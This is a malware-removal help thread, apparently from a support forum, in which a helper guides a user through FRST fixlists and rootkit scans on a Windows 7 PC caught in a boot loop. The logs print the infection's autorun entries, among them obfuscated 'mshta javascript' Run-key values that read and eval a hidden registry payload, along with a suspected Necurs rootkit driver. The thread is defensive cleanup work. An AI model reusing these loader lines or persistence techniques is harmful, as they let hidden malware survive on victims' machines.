2015-07-13 02:11 - 2015-07-13 02:12 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
C:\ProgramData\msrllq.exe
  • Save it to your USB flashdrive as fixlist.txt

NOTICE: This script was written specifically for this user. Running it on another machine may cause damage to your operating system

Boot into Recovery Environment

  • Start FRST in a similar manner to when you ran a scan earlier, but this time when it opens ....
    • Press the Fix button once and wait.
    • FRST will process fixlist.txt
    • When finished, it will produce a log fixlog.txt on your USB flashdrive.
  • Exit out of Recovery Environment and copy/paste the log please.
 
Fixlog.txt



Fix result of Farbar Recovery Scan Tool (x64) Version:20-07-2015
Ran by SYSTEM at 2015-07-24 16:10:57 Run:1
Running from C:\
Boot Mode: Recovery
==============================================
fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:Ms3ZRq7u="V";g1l9=new%20ActiveXObject("WScript.Shell");ZolWKzx5R="EN4hV7";wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");Zyilg2gbV="hhx";eval(wNvs09);UeEVVe2o7="LbiEUgXF"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [**fdb291dc<*>] => mshta javascript:X2USNjN5="K1v";V22z=new%20ActiveXObject("WScript.Shell");B2kFNQdtA9="IqT";eO11jM=V22z.RegRead("HKCU\\software\\0c778563\\2d0e539a");c3NvvUZAl="Q";eval(eO11jM);gVac7qe="v7DcfT"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
HKU\Thomas\...\Run: [FireFoxUpdServeisSystem] => C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis\Microsoft_naragugica.exe [77312 2015-07-14] ()
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
2015-07-21 13:08 - 2015-07-21 13:08 - 06420480 _____ C:\Program Files (x86)\GUTD3D3.tmp
2015-07-18 19:31 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\tor
2015-07-14 03:26 - 2015-07-14 03:26 - 00094152 _____ C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys
2015-07-14 03:22 - 2015-07-23 23:27 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis
2015-07-14 03:22 - 2015-07-14 03:22 - 00000064 _____ C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys
2015-07-13 09:46 - 2015-07-13 09:46 - 00000000 ____D C:\ProgramData\DifhAvud
2015-07-13 05:48 - 2015-07-13 08:49 - 00266240 _____ C:\Users\Thomas\AppData\Roaming\C_G1awex.exe
2015-07-13 02:12 - 2015-07-13 02:14 - 00000157 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.dat
2015-07-13 02:11 - 2015-07-14 03:22 - 00000000 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.exe
2015-07-13 02:11 - 2015-07-13 02:12 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
C:\ProgramData\msrllq.exe
*****************
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\711536280 => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\**3fc8a7d2<*> => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\**fdb291dc<*> => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\d3dxawex => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\DifhAvud => value removed successfully
HKU\Thomas\Software\Microsoft\Windows\CurrentVersion\Run\\FireFoxUpdServeisSystem => value removed successfully
NetworkHostSrv => Service removed successfully
8b66cd9be5c7a4f2 => Service removed successfully
fqjnrwka => Service removed successfully
MBAMSwissArmy => Service removed successfully
PcdrNdisuio => Service removed successfully
VBoxNetFlt => Service removed successfully
C:\Program Files (x86)\GUTD3D3.tmp => moved successfully.
C:\Users\Thomas\AppData\Roaming\tor => moved successfully.
C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys => moved successfully.
C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis => moved successfully.
C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys => moved successfully.
C:\ProgramData\DifhAvud => moved successfully.
C:\Users\Thomas\AppData\Roaming\C_G1awex.exe => moved successfully.
C:\Users\Thomas\AppData\Local\svcxdcl32.dat => moved successfully.
C:\Users\Thomas\AppData\Local\svcxdcl32.exe => moved successfully.
C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} => moved successfully.
C:\ProgramData\msrllq.exe => moved successfully.
==== End of Fixlog 16:10:58 ====
 
Are you still in a loop or can you start the computer normally now?

If you can start the computer normally, please do the following:


  • Download Malwarebytes Anti-Rootkit from HERE
  • Unzip the contents to a folder in a convenient location, preferably the desktop.
  • Open the folder where the contents were unzipped and run mbar.exe. Note: If a rootkit is interfering with the installation of the drivers you will see a message that states that the DDA driver was not installed and that you should reboot your computer to install it. Click Yes.
  • Follow the instructions in the wizard to update and allow the program to scan your computer for threats.
  • Click on the Cleanup button to remove any threats and reboot if prompted to do so.
  • Wait while the system shuts down and the cleanup process is performed.
  • Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
  • When done, please post the two logs produced they will be in the MBAR folder..... mbar-log.txt and system-log.txt
 
The PC is still not booting, appears to be in the same loop. :-(

I am seeing the following:

Problem Signature 07: CorruptFile
 
Last edited:
Please provide a fresh FRST log.

Plug the flash drive you prepared previously into the infected PC.

Enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Choose your language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account an click Next.

On the System Recovery Options menu you will get the following options:
Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt

  • Select Command Prompt
  • In the command window type in notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select "Computer" and find your flash drive letter and close the notepad.
  • In the command window type e:\frst.exe (for x64 bit version type e:\frst64) and press Enter
    Note: Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
 
Corrine

Thanks for your help thus far, output frst64 below:


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:20-07-2015
Ran by SYSTEM on MININT-7F955RL on 24-07-2015 23:05:03
Running from C:\
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Recovery
The current controlset is ControlSet001
ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Stage Remote] => C:\Program Files (x86)\Dell\Stage Remote\StageRemote.exe [2022976 2011-06-27] ()
HKLM\...\Run: [boinctray] => C:\Program Files\BOINC\boinctray.exe [68928 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [boincmgr] => C:\Program Files\BOINC\boincmgr.exe [8926016 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-06] (Apple Inc.)
HKLM-x32\...\Run: [RemoteControl9] => C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2010-10-01] (CyberLink Corp.)
HKLM-x32\...\Run: [PDVD9LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-09-17] (CyberLink Corp.)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [616272 2015-04-07] (McAfee, Inc.)
HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-11-24] (Sonic Solutions)
HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [514544 2010-11-17] ()
HKLM-x32\...\Run: [AccuWeatherWidget] => C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\accuweather.exe [968048 2012-02-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [719272 2015-04-02] (McAfee, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [335232 2015-04-10] (Oracle Corporation)
HKLM\...\RunOnce: [*Restore] => C:\Windows\system32\rstrui.exe [296960 2015-05-25] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\Orrin JNR\...\Run: [Google Update] => C:\Users\Orrin JNR\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-07-15] (Google Inc.)
HKU\Thomas\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-16] (Skype Technologies S.A.)
HKU\Thomas\...\Run: [Amazon Music] => C:\Users\Thomas\AppData\Local\Amazon Music\Amazon Music Helper.exe [6277952 2014-12-07] ()
HKU\Thomas\...\Run: [OneDrive] => C:\Users\Thomas\AppData\Local\Microsoft\OneDrive\OneDrive.exe [382664 2015-05-22] (Microsoft Corporation)
HKU\Thomas\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\Thomas\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2739888 2015-05-18] (Microsoft Corporation)
S2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [155368 2015-07-03] (McAfee, Inc.)
S2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [753768 2015-04-07] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
S2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.5.450.0\McCSPServiceHost.exe [207344 2015-04-08] (McAfee, Inc.)
S2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [612688 2015-04-09] (McAfee, Inc.)
S2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-02-17] (McAfee, Inc.)
S2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [372144 2015-04-06] (McAfee, Inc.)
S2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-02-17] (McAfee, Inc.)
S2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-02-17] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
S2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-03-27] (McAfee, Inc.)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [401736 2015-02-17] (McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [337888 2015-02-17] (McAfee, Inc.)
S0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [101872 2015-02-17] (McAfee, Inc.)
S3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [488000 2015-02-17] (McAfee, Inc.)
S0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [864072 2015-02-17] (McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [482600 2015-01-15] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [100720 2015-01-15] (McAfee, Inc.)
S0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [340448 2015-02-17] (McAfee, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2013-01-03] (Duplex Secure Ltd.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-24 11:40 - 2015-07-24 23:05 - 00000000 _____ C:\FRST.txt
2015-07-24 11:36 - 2015-07-24 23:05 - 00000000 ____D C:\FRST
2015-07-23 01:37 - 2015-07-23 01:37 - 02135552 _____ (Farbar) C:\frst64.exe
2015-07-21 12:29 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Desktop\SFCFix.zip
2015-07-21 12:24 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Downloads\SFCFix.zip
2015-07-17 14:37 - 2015-07-21 12:51 - 00000000 ____D C:\Users\Thomas\AppData\Local\niemiro
2015-07-17 05:03 - 2015-07-17 05:03 - 00000387 _____ C:\Users\Thomas\Desktop\copy.txt
2015-07-17 04:56 - 2015-07-17 04:57 - 00000000 ____D C:\Users\Thomas\copy
2015-07-17 04:55 - 2015-07-17 04:55 - 00000000 ____D C:\Users\Thomas\Downloads\Copy
2015-07-17 03:11 - 2015-07-21 12:51 - 00003148 _____ C:\Users\Thomas\Desktop\SFCFix.txt
2015-07-17 03:11 - 2015-07-21 12:51 - 00000000 ____D C:\SFCFix
2015-07-17 02:50 - 2015-07-17 02:55 - 00003212 _____ C:\Users\Thomas\sfcdetails.txt
2015-07-15 23:06 - 2015-07-15 23:06 - 00000000 ____D C:\Quarantine
2015-07-15 22:56 - 2015-07-17 03:37 - 00000000 ____D C:\Program Files (x86)\stinger
2015-07-15 22:55 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\Downloads\stinger32-epo
2015-07-15 13:35 - 2015-07-15 13:35 - 00000000 ____D C:\Users\Thomas\Desktop\McAfee File Lock
2015-07-15 12:14 - 2015-07-15 13:18 - 00095802 _____ C:\Users\Thomas\Desktop\sfcdetails.txt
2015-07-15 11:58 - 2015-07-15 11:58 - 00000000 ____D C:\Users\Thomas\McAfee File Lock
2015-07-14 03:26 - 2015-07-14 03:26 - 00000342 _____ C:\Windows\PFRO.log
2015-07-13 12:45 - 2015-07-14 03:26 - 00000112 _____ C:\Windows\setupact.log
2015-07-13 12:45 - 2015-07-13 12:45 - 00000000 _____ C:\Windows\setuperr.log
2015-07-13 12:16 - 2015-07-13 12:16 - 00000000 ____D C:\Windows\System32\McAfee File Lock
2015-07-03 06:35 - 2015-07-12 10:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-28 10:52 - 2015-06-29 01:12 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\vlc
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\Users\Public\Desktop\VLC media player.lnk
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\ProgramData\Desktop\VLC media player.lnk
2015-06-28 10:49 - 2015-06-28 10:49 - 28849904 _____ C:\Users\Thomas\Downloads\vlc-2.2.1-win32.exe
2015-06-28 10:49 - 2015-06-28 10:49 - 00000000 ____D C:\Program Files (x86)\VideoLAN
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-23 23:28 - 2014-12-09 19:22 - 00000000 ____D C:\Windows\System32\appraiser
2015-07-23 23:28 - 2014-08-09 05:12 - 00000000 ____D C:\users\Guest
2015-07-23 23:28 - 2014-05-06 18:00 - 00000000 ___SD C:\Windows\System32\CompatTel
2015-07-23 23:28 - 2012-07-15 07:50 - 00000000 ____D C:\users\Orrin JNR
2015-07-23 23:28 - 2012-05-08 08:58 - 00000000 ____D C:\users\Thomas
2015-07-23 23:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\servicing
2015-07-23 23:27 - 2015-05-15 23:52 - 00000000 __RSD C:\Users\Thomas\Documents\McAfee Vaults
2015-07-23 23:27 - 2015-04-04 18:00 - 00000000 ___SD C:\Windows\System32\GWX
2015-07-23 23:27 - 2014-05-14 11:23 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Skype
2015-07-23 23:27 - 2012-11-29 11:21 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\uTorrent
2015-07-23 23:27 - 2012-05-09 12:20 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-07-23 23:27 - 2012-05-01 03:52 - 00000000 ____D C:\Program Files (x86)\Dell DataSafe Local Backup
2015-07-23 23:25 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
2015-07-23 23:23 - 2012-05-08 09:19 - 00000000 ____D C:\ProgramData\BOINC
2015-07-23 23:22 - 2015-04-04 02:39 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-07-23 23:22 - 2012-05-01 04:08 - 00000000 ____D C:\Program Files\mcafee
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default\AppData\Local\SoftThinks
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default User\AppData\Local\SoftThinks
2015-07-22 10:05 - 2013-10-23 06:27 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-07-21 12:57 - 2012-05-01 04:15 - 00000000 ____D C:\ProgramData\Sonic
2015-07-15 19:47 - 2010-11-20 23:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-07-14 14:58 - 2012-05-08 09:00 - 00000422 _____ C:\Windows\Tasks\SystemToolsDailyTest.job
2015-07-14 14:17 - 2013-03-28 13:55 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-14 14:06 - 2012-09-02 09:09 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-14 13:17 - 2013-03-28 13:55 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-14 13:17 - 2012-05-01 03:35 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-14 13:17 - 2012-05-01 03:35 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-14 12:49 - 2012-07-15 12:24 - 00000872 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3274687172-3602840966-2228239552-1006Core.job
2015-07-14 09:06 - 2012-09-02 09:09 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:26 - 2009-07-13 21:08 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-14 03:26 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-13 19:42 - 2015-04-04 02:44 - 00004978 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for trustno1-Thomas trustno1
2015-07-13 12:46 - 2012-12-22 03:26 - 00000000 ___RD C:\Users\Thomas\SkyDrive
2015-07-13 10:53 - 2015-05-15 23:49 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-07-13 10:53 - 2014-08-21 12:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-13 05:00 - 2012-05-09 05:00 - 00003488 _____ C:\Windows\System32\Tasks\PCDEventLauncher
2015-07-13 05:00 - 2012-05-08 09:00 - 00003450 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2015-07-12 09:07 - 2009-07-13 21:13 - 00006506 _____ C:\Windows\System32\PerfStringBackup.INI
2015-07-12 09:00 - 2012-05-08 09:00 - 00000564 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2015-07-12 08:47 - 2014-11-12 00:47 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieBrowserModeList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieUserList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieSiteList
2015-07-04 19:00 - 2012-05-08 09:00 - 00004268 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2015-07-02 12:51 - 2009-07-13 21:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2015-06-26 03:30 - 2014-11-09 11:44 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-06-26 03:30 - 2012-05-01 03:54 - 00000000 ____D C:\ProgramData\Skype
==================== Known DLLs (Whitelisted) ================

==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
==================== Restore Points =========================
Restore point made on: 2015-07-14 15:00:12
==================== Memory info ===========================
Percentage of memory in use: 10%
Total physical RAM: 8104.63 MB
Available physical RAM: 7266.64 MB
Total Virtual: 8102.83 MB
Available Virtual: 7259.28 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:450.91 GB) (Free:145.41 GB) NTFS
Drive d: (GSP1RMCHPXFRER_EN_DVD) (CDROM) (Total:3.09 GB) (Free:0 GB) UDF
Drive g: (RECOVERY) (Fixed) (Total:14.81 GB) (Free:5.74 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive h: (TOSHIBA EXT) (Fixed) (Total:465.76 GB) (Free:462.85 GB) NTFS
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: ACEA298C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450.9 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 35E8B3A5)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

LastRegBack: 2015-07-14 03:56
==================== End of log ============================
 
I see it now! Give me some time to go over the log more closely and then I'll provide new instructions.
 
Oh ok!!

Is this the line?

S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()
 
You have a good eye. Yes, that is it but I want to check some other things as well. It goes by the name "Necurs" but other files I had seen in your previous log referenced a backdoor bot.
 
You must log in or register to reply here.

Has Sysnative Forums helped you? Please consider donating to help us support the site!

Back
Top